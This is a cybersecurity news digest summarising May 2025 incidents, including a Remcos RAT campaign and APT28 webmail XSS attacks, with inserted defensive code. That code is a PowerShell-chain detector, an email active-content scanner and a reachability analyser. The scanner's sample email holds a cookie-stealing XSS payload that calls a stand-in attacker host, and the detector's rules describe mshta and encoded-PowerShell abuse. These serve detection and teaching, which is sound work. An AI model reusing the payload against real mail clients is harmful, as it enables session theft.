Daily Brief
Articles are listed below; the summaries in the table are generated automatically.
Total articles found: 12776
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-05-16 09:04:39 | theregister | CYBERCRIME | Rising AI-Driven Cyber Threats Challenge Global Security Leaders | A Darktrace report finds that 74% of cybersecurity professionals worldwide already regard AI-powered threats as a significant challenge to their defenses.
Attackers are using AI for more convincing phishing and more adaptable malware, which the report argues calls for an equally AI-augmented defensive response.
Darktrace reports a 135% rise in novel social engineering attacks in 2023, coinciding with the public release of ChatGPT and similar tools.
Despite this, many organizations feel underprepared because of a persistent cybersecurity skills shortage; 45% of respondents expressed concern about their readiness.
Most organizations are currently focused on using AI to speed up and streamline their own security response, with 95% acknowledging its potential benefits.
88% of respondents prefer an integrated, AI-driven security platform over isolated point solutions, aiming for comprehensive and preventative coverage.
The study also highlights a gap in understanding of which AI techniques are actually in use: only 42% of professionals said they fully understand the AI models their tools employ. | Details |
| 2025-05-16 08:13:50 | bleepingcomputer | CYBERCRIME | CISA Alerts on Actively Exploited Chrome Vulnerability in Federal Agencies | CISA has warned U.S. federal agencies that a high-severity vulnerability in the Chrome web browser is being exploited in attacks.
The flaw, tracked as CVE-2025-4664, was reported by Solidlab security researcher Vsevolod Kokorin and has been patched by Google.
It allows an attacker to leak sensitive cross-origin data via a specially crafted HTML page, which in some scenarios can lead to account takeover.
Alongside the update that fixes it, Google said it is aware of reports that an exploit for the flaw exists in the wild.
CISA has added the flaw to its Known Exploited Vulnerabilities catalog; under Binding Operational Directive (BOD) 22-01, issued in November 2021, federal civilian agencies must apply the patch within three weeks, by June 5.
This is the second Chrome zero-day exploited in attacks this year; the first was used in cyber-espionage attacks on Russian organizations, including government bodies.
All network defenders, not only federal agencies, are urged to prioritize patching this flaw. | Details |
| 2025-05-16 08:02:08 | thehackernews | MALWARE | New Fileless Malware Campaign Uses PowerShell to Deploy Remcos RAT | Researchers have uncovered a campaign that uses PowerShell-based shellcode loaders to deliver the Remcos RAT.
Malicious LNK files packed inside ZIP archives are disguised as Office documents and use tax-related lures to trick users into opening them.
The LNK file launches the legitimate Microsoft mshta.exe utility to run an HTA file, which downloads the remaining components and modifies the registry for persistence.
The final payload runs entirely in memory, leaving little on disk and evading many file-based security controls.
Remcos gives the operator full control of the host, including keystroke logging, screenshot capture and system information collection.
Its command-and-control traffic is encrypted with TLS, supporting ongoing data theft and remote manipulation of the system.
Fileless techniques like this expose the limits of conventional file-based defenses and underline the need for behavioural detection, including real-time PowerShell monitoring and stronger email filtering.
Combined with developments such as AI-assisted polymorphic malware, this kind of fileless infection poses a significant challenge to current defensive approaches. | Details |
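The execution chain described in this item (LNK lure, mshta.exe running an HTA, PowerShell with an encoded command, Run-key persistence) is exactly what endpoint telemetry can catch even when the payload never touches disk. The following is an added example, not code from the article or from any vendor: a small detector that walks process-creation and registry events, reconstructs the parent chain, and flags the suspicious links. The event schema (loosely modelled on Sysmon Event ID 1 and 13 fields) and all sample events are constructed for this demonstration; the base64 blob is a placeholder, not a real payload.

```python
"""Flag the mshta.exe -> PowerShell -> Run-key chain in process telemetry.

Added example. The event dicts below are constructed sample data, not real
logs; field names only loosely follow Sysmon Event ID 1 (process create)
and Event ID 13 (registry value set).
"""
import re

SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # LNK lure launches mshta.exe against a remote HTA
    {"type": "process", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/tax_form.hta"},
    # HTA spawns hidden PowerShell with an encoded command (placeholder blob)
    {"type": "process", "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # PowerShell writes Run-key persistence pointing back at mshta.exe
    {"type": "registry", "pid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"mshta.exe C:\Users\Public\up.hta"},
    # Benign: an admin runs a script from Explorer, no script host, no -enc
    {"type": "process", "pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe")
# -e / -ec / -en / -enc / -EncodedCommand, surrounded by whitespace
ENCODED_FLAG = re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return a list of (rule_id, pid, detail) findings over the events."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []

    def parent_chain(pid):
        """[self, parent, grandparent, ...] image names, cycle-safe."""
        chain, seen = [], set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            chain.append(basename(procs[pid]["image"]))
            pid = procs[pid]["ppid"]
        return chain

    for e in events:
        if e["type"] == "process":
            name = basename(e["image"])
            cmd = e["cmdline"]
            chain = parent_chain(e["pid"])
            # Rule 1: mshta.exe given a URL or an .hta file to execute
            if name == "mshta.exe" and re.search(r"https?://|\.hta\b", cmd, re.I):
                findings.append(("mshta_remote_hta", e["pid"], cmd))
            # Rule 2: PowerShell whose direct parent is a script host
            if name == "powershell.exe" and len(chain) > 1 and chain[1] in SCRIPT_HOSTS:
                findings.append(("powershell_from_script_host", e["pid"], " <- ".join(chain)))
            # Rule 3: PowerShell launched with an encoded command line
            if name == "powershell.exe" and ENCODED_FLAG.search(cmd + " "):
                findings.append(("powershell_encoded_command", e["pid"], cmd))
        elif e["type"] == "registry":
            # Rule 4: Run-key persistence written by PowerShell or a script host
            writer = basename(e["image"])
            if RUN_KEY.search(e["key"]) and writer in SCRIPT_HOSTS + ("powershell.exe",):
                findings.append(("runkey_persistence_by_script_host", e["pid"], e["key"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:36s} pid={pid} {detail}")
```

Rule 2 is the one that survives renaming and obfuscation of the command line, because it keys on the parent-child relationship rather than on strings; rules 1 and 3 are cheap to evade individually but make good corroboration. The benign PowerShell launch (pid 400) triggers none of the rules.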
| 2025-05-16 07:30:54 | thehackernews | MISCELLANEOUS | Learn to Defend Modern Apps From Code to Cloud in Free Webinar | Modern applications evolve quickly, often outpacing the security controls businesses put around them.
Security teams frequently scan code in isolation and respond to cloud threats later than ideal, leaving exploitable gaps.
Attackers can exploit such gaps within hours, while organizations may take days to react to critical cloud alerts.
Security responsibilities are split across teams such as DevSecOps, CloudSec and the SOC, leading to inefficiency and uncoordinated responses.
The webinar, hosted by Ory Segal of Cortex Cloud at Palo Alto Networks, addresses how to integrate application security across coding, cloud infrastructure, and security operations centers.
Attendees will learn strategies for a unified security approach, enhancing protection against potential breaches and attacks.
The session targets professionals in AppSec, CloudOps, DevSecOps, and SOC, aiming to provide actionable insights for immediate application. | Details |
| 2025-05-16 06:02:44 | theregister | CYBERCRIME | DoorDash Scam Nets $2.59 Million Using Insider-Driven Fraud | Sayee Chaitanya Reddy Devagiri has pleaded guilty to conspiracy to commit wire fraud in a scheme that netted $2.59 million through fraudulent DoorDash deliveries.
The conspirators created fake customer and driver accounts to order, and then confirm delivery of, food that never existed.
Stolen DoorDash employee credentials were used to manipulate order assignments inside the company's systems.
Marking the phantom deliveries as completed triggered payments through a vendor affiliated with DoorDash.
The scheme depended on insider access: some of the credentials were tied to Tyler Thomas Bottenhorn, who had briefly worked for DoorDash.
The fraud was repeated hundreds of times, reportedly taking less than five minutes per transaction.
Devagiri is the third defendant to plead guilty; he faces up to 20 years in prison and a $250,000 fine and is due back in court on September 16. | Details |
| 2025-05-16 06:02:44 | theregister | CYBERCRIME | FBI Alerts on Scammers Using Deepfake Voices of US Officials | The FBI has warned that scammers are using deepfake audio to impersonate senior US government officials in a fraud campaign.
The campaign mainly targets current and former government personnel and their contacts, with the goal of obtaining their account credentials.
The impersonators use AI voice cloning in smishing (SMS phishing) and vishing (voice phishing) messages.
Targets are encouraged to move the conversation to a separate messaging platform, presumably to make the activity harder to trace.
The FBI advises verifying any suspicious contact by calling the official back on a known, official number, and watching for anomalies in speech that could indicate a deepfake.
Listening for unusual verbal tics, phrases or intonation is one suggested way to spot AI-generated voices.
The falling cost and wide availability of AI tooling have substantially increased both the quality and the frequency of deepfake scams. | Details |
| 2025-05-15 19:18:24 | bleepingcomputer | NATION STATE ACTIVITY | Global Spy Campaign Targets Governments via Webmail Exploits | ESET researchers have identified a global cyberespionage operation, dubbed 'RoundPress', which they attribute to the Russian state-sponsored group APT28.
Active since 2023, the campaign uses zero-day and n-day exploits in webmail software to read email belonging to government targets.
Targets include government offices in several countries, military units, defense companies and critical infrastructure, predominantly in Europe.
Spear-phishing emails themed on current events carry malicious JavaScript that triggers cross-site scripting (XSS) flaws in the victim's webmail client.
The script runs as soon as the email is rendered in the browser; no click is required, and it steals webmail credentials and mailbox data.
Collected data includes email contents, contacts, webmail settings, login history and two-factor authentication details, all exfiltrated to attacker-controlled servers.
Over time the campaign has expanded to multiple webmail products, including Roundcube, Horde, MDaemon and Zimbra.
ESET has seen no activity so far in 2025, but the steady discovery of new XSS bugs in webmail products makes continuation or evolution of the tactic likely. | Details |
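Because the exploit in this campaign is carried inside the HTML body of an email and fires when the webmail client renders it, one practical control is to inspect inbound mail for active content before it reaches the mailbox at all. The following is an added example, not ESET's code or anything from the article: a gateway-style check that parses a raw RFC 5322 message with Python's standard `email` package, extracts every `text/html` part, and reports the constructs an XSS payload would need (script-capable tags, `on*` event handlers, `javascript:` URLs). The two messages are constructed for this demonstration and use `.invalid` domains.

```python
"""Report active content in the HTML parts of an email.

Added example. Both sample messages below are constructed for the
demonstration; no real payloads or domains are used.
"""
import email
from email import policy
from html.parser import HTMLParser

# Tags that can execute script, load external documents, or retarget links.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "meta", "base", "link", "form"}
# Attributes that carry URLs a browser will navigate to or fetch.
URL_ATTRS = {"href", "src", "action", "xlink:href", "formaction",
             "data", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class ActiveContentScanner(HTMLParser):
    """Collect tags and attributes that should never appear in mail HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip().lower().replace(" ", "")
            if name.startswith("on"):                 # onerror=, onload=, ...
                self.findings.append(f"event-handler:{tag}@{name}")
            elif name in URL_ATTRS and value.startswith(SCRIPT_SCHEMES):
                self.findings.append(f"script-url:{tag}@{name}")
            elif name == "style" and ("expression(" in value or "javascript:" in value):
                self.findings.append(f"active-style:{tag}")


def scan_message(raw_bytes):
    """Return findings for every text/html part of a raw message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = ActiveContentScanner()
        scanner.feed(part.get_content())
        scanner.close()
        findings.extend(scanner.findings)
    return findings


# Constructed sample: the HTML alternative hides an onerror handler and a
# javascript: link, the shape of payload used against webmail XSS bugs.
SAMPLE_EMAIL = b"""From: news@example.invalid
To: analyst@example.invalid
Subject: Latest headlines
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Read the headlines in the HTML version.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Today's <b>headlines</b></p>
<img src="https://example.invalid/logo.png" alt="logo">
<img src=x onerror="fetch('https://attacker.invalid/?c='+document.cookie)">
<a href="javascript:void(0)">more</a>
</body></html>
--b1--
"""

# Constructed benign message: plain HTML with an ordinary https link.
BENIGN_EMAIL = b"""From: it@example.invalid
To: analyst@example.invalid
Subject: Maintenance window
Content-Type: text/html; charset="utf-8"

<p>Mail will be offline Sunday 02:00-03:00.
<a href="https://intranet.example.invalid/status">Status page</a></p>
"""

if __name__ == "__main__":
    print("sample:", scan_message(SAMPLE_EMAIL))
    print("benign:", scan_message(BENIGN_EMAIL))
```

A check like this is a coarse filter rather than a sanitizer: the actual bugs exploited in this campaign were bypasses of the webmail products' own HTML sanitizers, so the real fix is patching those products. Quarantining or stripping HTML parts that trip these rules still removes the delivery vector for the common payload shapes while the patch is rolled out.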
| 2025-05-15 18:28:09 | bleepingcomputer | CYBERCRIME | FBI Warns of AI Voice Deepfake Attacks on U.S. Officials | The FBI has issued a public service announcement warning that, since April 2025, AI-generated voice deepfakes have been used in phishing attacks against current and former senior U.S. officials.
The perpetrators impersonate senior officials to build rapport and then trick targets into handing over access to personal or government accounts.
The agency highlighted smishing (SMS) and vishing (voice) messages that appear to come from high-ranking officials.
Once inside an account, attackers mine it for contact details and sensitive information about other officials, and may try to extract further information or money.
The warning follows a 2021 FBI notification that predicted deepfakes would be used increasingly in cyber operations.
Europol and the U.S. Department of Health and Human Services have likewise warned in earlier advisories of deepfakes being used in fraud and social engineering.
An attempted attack on LastPass, in which an employee received deepfake audio impersonating the company's CEO, shows the threat is already real.
The announcement aims to raise awareness and includes mitigation advice for identifying and defending against these tactics. | Details |
| 2025-05-15 17:31:45 | theregister | CYBERCRIME | Scattered Spider Cyberattacks Shift Focus from UK to US Retailers | Scattered Spider, the group behind recent attacks on UK retailers, has begun targeting the IT infrastructure of major US retailers.
Google's Mandiant threat intelligence unit has linked the activity to potential deployment of DragonForce ransomware.
Affected organizations have responded with aggressive containment measures, which have in some cases caused operational disruption themselves.
The group, made up largely of young men in the US and UK, went quiet after a series of arrests but has recently resumed operations.
Fewer than ten large US retailers have been targeted so far, with varying degrees of compromise and of disruption from defensive action.
Scattered Spider historically rotates between sectors, and analysts expect it to move on from retail before long.
The high profile of these attacks increases the likelihood of further law-enforcement action. | Details |
| 2025-05-15 16:53:11 | thehackernews | DATA BREACH | Meta Faces Legal Threat Over AI Training Without User Consent | Meta plans to start training its AI models on E.U. users' data from May 27, 2025, without obtaining explicit opt-in consent.
Austrian privacy group noyb has sent Meta a cease-and-desist letter and threatened a class action over the plan.
Meta relies on 'legitimate interest' as its legal basis, avoiding the need for direct consent; noyb argues this does not satisfy GDPR requirements.
The rollout was paused in June 2024 after concerns raised by Irish data protection authorities, but Meta now intends to proceed.
noyb contends that opt-in consent from as little as 10% of users would give Meta enough data to learn E.U. languages and cultural diversity.
It also notes that other AI providers build better models without social-network data, undermining Meta's necessity argument.
National data protection authorities have not yet ruled on whether this non-consensual use of data for AI training is lawful.
Meta maintains that its approach is lawful and points out that users can object to the processing. | Details |
| 2025-05-15 16:44:52 | bleepingcomputer | DATA BREACH | Nova Scotia Power Hit by Data Breach, Customer Data Stolen | Nova Scotia Power has confirmed that sensitive customer data was stolen in a breach stemming from unauthorized network access discovered last month.
The intrusion was detected on April 28, 2025; the investigation found that attackers had first gained access on March 19, 2025, about six weeks before detection and nearly two months before customers were notified.
The utility, which serves more than 500,000 customers in Canada, said electricity generation and distribution were unaffected, though internal operations were disrupted.
The stolen data includes personal information; the company says it has seen no evidence of misuse so far.
Nova Scotia Power is offering affected customers two years of free credit monitoring through TransUnion.
Customers are advised to be wary of phishing attempts, since threat actors may impersonate the utility.
No ransomware group has claimed responsibility for the incident. | Details |
| 2025-05-15 16:38:06 | theregister | DATA BREACH | Coinbase Faces $20M Extortion after Insider-Influenced Data Theft | Coinbase was targeted by criminals who bribed support staff to steal customer data and then demanded a $20 million ransom.
Fewer than 1 percent of Coinbase's monthly transacting users were affected, and no passwords or private keys were compromised.
The stolen data was used in social engineering attacks to defraud Coinbase customers.
Rather than pay, Coinbase has offered a $20 million reward for information leading to the arrest and conviction of those responsible.
The company has fired the staff involved, strengthened its fraud monitoring, and is reimbursing affected customers.
Further measures include investment in anti-fraud technology and plans to open a new US support hub.
Total remediation and reimbursement costs are estimated at between $180 million and $400 million.
Coinbase says no customer funds were accessed and there was no material operational impact, though its shares fell by more than 7%. | Details |
| 2025-05-15 15:49:01 | bleepingcomputer | MISCELLANEOUS | Security Flaws Exposed in Windows 11 and Red Hat at Pwn2Own 2025 | On the first day of Pwn2Own Berlin 2025, researchers demonstrated working exploits against Windows 11, Red Hat Enterprise Linux and Oracle VirtualBox, earning $260,000 in prizes.
Multiple zero-days were used to gain root or SYSTEM privileges, with bug classes including use-after-free, integer overflow and out-of-bounds write.
Teams including DEVCORE demonstrated previously unknown vulnerabilities in widely deployed enterprise software.
Notable results included guest-to-host escapes from Oracle VirtualBox and Docker Desktop that gave code execution on the underlying host OS.
The contest's targets span AI frameworks, web browsers, virtualization software and enterprise applications, with a total prize pool of more than $1,000,000.
No attempts were made against the Tesla vehicles included as targets this year.
Vendors have 90 days from the event to patch the vulnerabilities demonstrated before details are published. | Details |
| 2025-05-15 15:34:02 | theregister | MISCELLANEOUS | Socket Acquires Coana to Enhance Security Alert Efficiency | Socket has acquired Coana, a startup whose technology helps prioritize security alerts by telling developers which reported vulnerabilities can safely be ignored.
Founded by researchers from Aarhus University, Coana uses reachability analysis to determine whether application code actually reaches the vulnerable code in a dependency, and therefore whether an attacker could realistically exploit it.
The tool relies on static analysis, which evaluates large codebases quickly and at scale; Coana claims low rates of both false positives and false negatives.
Traditional dependency scanners produce large volumes of alerts, most of them noise that adds to developers' workload, which Coana's approach aims to cut.
Reachability analysis matters especially for dynamic languages such as JavaScript and Python, where static analysis is harder.
The acquisition addresses complaints from Socket users about being overwhelmed by alerts from dependency scans of application libraries.
Socket's CEO said alert volume remains a persistent challenge, noting that Socket catches around 500 malicious packages per week. | Details |
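To make the idea of reachability concrete: an alert for a vulnerable function in a dependency only matters if some path from the application's entry point actually calls it. The following is an added example (not Coana's or Socket's code) of the simplest form of that analysis for Python, built on the standard `ast` module: it resolves three call shapes (local `f()`, `mod.f()` after `import mod`, and `f()` after `from mod import f`), builds a cross-module call graph, and does a breadth-first search from an entry point. The two modules are constructed in memory, and `dep.load_config` is merely assumed vulnerable for the demonstration. Real tools also handle dynamic dispatch, method calls on objects, callbacks and re-exports, which is where most of the difficulty in dynamic languages lies.

```python
"""Minimal static reachability analysis over Python source.

Added example. The application and dependency sources below are constructed
for the demonstration; `dep.load_config` is assumed to carry a known
vulnerability purely so that there is something to triage.
"""
import ast
from collections import deque

DEP_SRC = '''
def load_config(text):
    return eval(text)          # assumed vulnerable sink for this example

def render(template, ctx):
    return template.format(**ctx)

def legacy_import(blob):
    return load_config(blob)   # calls the sink, but is it itself reachable?
'''

APP_SRC = '''
import dep
from dep import render

def show(user):
    return render("Hello {name}", {"name": user})

def main():
    print(show("alice"))
    print(dep.render("x", {}))
    return 0
'''


def call_graph(modules):
    """Build {caller_fqn: {callee_fqn}} over a dict of {module_name: source}.

    Only top-level functions are modelled; calls that cannot be resolved to a
    known module (builtins, method calls on arbitrary objects) are dropped,
    which makes this analysis unsound in the direction of false negatives.
    """
    graph = {}
    for mod_name, src in modules.items():
        tree = ast.parse(src)
        aliases = {}  # local name -> fully-qualified name it refers to
        for node in tree.body:
            if isinstance(node, ast.Import):
                for a in node.names:
                    aliases[a.asname or a.name] = a.name
            elif isinstance(node, ast.ImportFrom) and node.module:
                for a in node.names:
                    aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        local_funcs = {n.name for n in tree.body if isinstance(n, ast.FunctionDef)}

        def resolve(func, local_funcs=local_funcs, aliases=aliases, mod_name=mod_name):
            if isinstance(func, ast.Name):
                if func.id in local_funcs:
                    return f"{mod_name}.{func.id}"
                return aliases.get(func.id)          # from mod import f
            if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
                base = aliases.get(func.value.id)    # import mod; mod.f()
                return f"{base}.{func.attr}" if base else None
            return None

        for fn in tree.body:
            if not isinstance(fn, ast.FunctionDef):
                continue
            caller = f"{mod_name}.{fn.name}"
            graph.setdefault(caller, set())
            for node in ast.walk(fn):
                if isinstance(node, ast.Call):
                    callee = resolve(node.func)
                    if callee:
                        graph[caller].add(callee)
    return graph


def reachable(graph, entry, target):
    """Shortest call path from entry to target, or None if unreachable."""
    queue, seen = deque([[entry]]), {entry}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in graph.get(path[-1], ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def triage(graph, entry, vulnerable_functions):
    """Map each flagged function to its call path from entry (None = ignorable)."""
    return {v: reachable(graph, entry, v) for v in vulnerable_functions}


GRAPH = call_graph({"dep": DEP_SRC, "app": APP_SRC})

if __name__ == "__main__":
    for fn, path in triage(GRAPH, "app.main", ["dep.load_config", "dep.render"]).items():
        print(fn, "->", " -> ".join(path) if path else "unreachable from app.main")
```

Run from `app.main`, the alert on `dep.load_config` is unreachable (only `dep.legacy_import`, which nothing in the app calls, reaches it) and can be deprioritized, while `dep.render` is reachable directly. The caveat in the docstring is the important one for a security reviewer: a resolver that drops calls it cannot understand will report "unreachable" for code that is in fact reached dynamically, so the analysis must be conservative about what it cannot resolve before its "ignore" verdicts are trusted.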
| 2025-05-15 15:20:20 | bleepingcomputer | MISCELLANEOUS | Tor Introduces Oniux for Enhanced Linux App Anonymization | The Tor Project has released Oniux, a new command-line tool that routes the network traffic of any Linux application through the Tor network.
Unlike torsocks, which works by preloading a library into the target process, Oniux uses Linux namespaces to place the application in an isolated network environment, preventing traffic from leaking outside Tor.
It isolates the application at the kernel level, giving it a virtual network interface and its own DNS configuration so that all of its traffic can only go through Tor.
Because the isolation is enforced by the kernel rather than by intercepting library calls, Oniux is designed to be leak-proof in ways torsocks cannot be.
The tool is still experimental and is not recommended for critical use until it has had more testing.
Tor has published the source code and is asking the community to test and refine Oniux so that it can be relied on for broader deployment.
Those who want to try it can install it with Rust's tooling, using the commands provided by the Tor Project. | Details |